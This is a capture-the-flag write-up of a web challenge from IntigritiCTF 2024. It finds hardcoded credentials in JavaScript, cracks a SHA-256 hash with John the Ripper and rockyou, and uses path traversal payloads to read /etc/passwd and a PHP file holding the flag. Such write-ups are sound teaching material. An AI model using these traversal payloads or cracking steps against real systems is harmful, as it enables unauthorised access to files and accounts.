Hacking Into Pizza Paradise: A CTF Journey to the Flag
Hey everyone! This is the write-up for the first web challenge of IntigritiCTF2k24. I hope you find it insightful and helpful in your CTF journey. Let’s dive right in!
1. Initial Reconnaissance
I started the challenge by checking out the source code of the web application, but there was nothing useful there at first glance. So, I moved on to the next step.
Exploring robots.txt
A quick look at the robots.txt file revealed an interesting path: /secret.html.
Upon visiting the /secret.html page, I discovered a login panel:
2. Inspecting the Login Panel
I then checked the source code of the login panel. Here’s an interesting part of the JavaScript code responsible for password hashing:
<script>
function hashPassword(password) {
return CryptoJS.SHA256(password).toString();
}function validate() {
const username = document.getElementById("username").value;
const password = document.getElementById("password").value; const credentials = getCredentials();
const passwordHash = hashPassword(password); if (username === credentials.username && passwordHash === credentials.passwordHash) {
return true;
} else {
alert("Invalid credentials!");
return false;
}
}
</script>
This script hashes the password using SHA-256 and compares it with the stored hashed value. It also hints that the credentials might be somewhere in the JavaScript files.
3. Discovering Hardcoded Credentials
By inspecting the network requests and headers, I found that the credentials were hardcoded in the auth.js file.
In auth.js, I found the following username and hashed password:
4. Cracking the Hashed Password
The password is hashed using SHA-256, so I decided to crack it using John the Ripper. Here's the process:
- Save the hash to a file:
echo "91a915b6bdcfb47045859288a9e2bd651af246f07a083f11958550056bed8eac" > hash.txt2. Use John the Ripper to crack it with the rockyou.txt wordlist:
john --format=raw-sha256 --wordlist=/usr/share/wordlists/rockyou.txt hash.txtThe cracked password is intel420.
Now, I had the username: agent_1337 and the password: intel420.
5. Exploiting the File Download Functionality
Upon logging in, I noticed a “Download” button. Clicking it triggered the following GET request:
https://pizzaparadise.ctf.intigriti.io/topsecret_a9aedc6c39f654e55275ad8e65e316b3.php?download=/assets/images/topsecret1.pngHowever, the path was restricted, and I received the error: File path not allowed.
I thought about bypassing this by using path traversal. I modified the download parameter to:
https://pizzaparadise.ctf.intigriti.io/topsecret_a9aedc6c39f654e55275ad8e65e316b3.php?download=/assets/images/../../../../../etc/passwdThis allowed me to access /etc/passwd, but that wasn't where the flag was located.
6. Final Path Traversal and Flag Retrieval
As I dug deeper into the URL structure, I noticed that the image name in the URL was topsecret_a9aedc6c39f654e55275ad8e65e316b3.php. I decided to try another path traversal with this PHP file:
https://pizzaparadise.ctf.intigriti.io/topsecret_a9aedc6c39f654e55275ad8e65e316b3.php?download=/assets/images/../../topsecret_a9aedc6c39f654e55275ad8e65e316b3.phpThis successfully downloaded the PHP file, and inside, I found the flag:
$flag = 'INTIGRITI{70p_53cr37_m15510n_c0mpl373}';Conclusion
By following a few logical steps, I was able to crack the password, exploit the path traversal vulnerability, and successfully retrieve the flag. This challenge was a great exercise in identifying weak password management, as well as using path traversal to access sensitive files and eventually find the flag.
Flag: INTIGRITI{70p_53cr37_m15510n_c0mpl373}
I hope you enjoyed this write-up! Feel free to share your thoughts and let me know how you would have approached the challenge differently.
Want to connect?
Clap for this story if you enjoyed it and share your thoughts in the comments. Let’s connect on LinkedIn or X (formerly Twitter) to discuss more bug hunting adventures!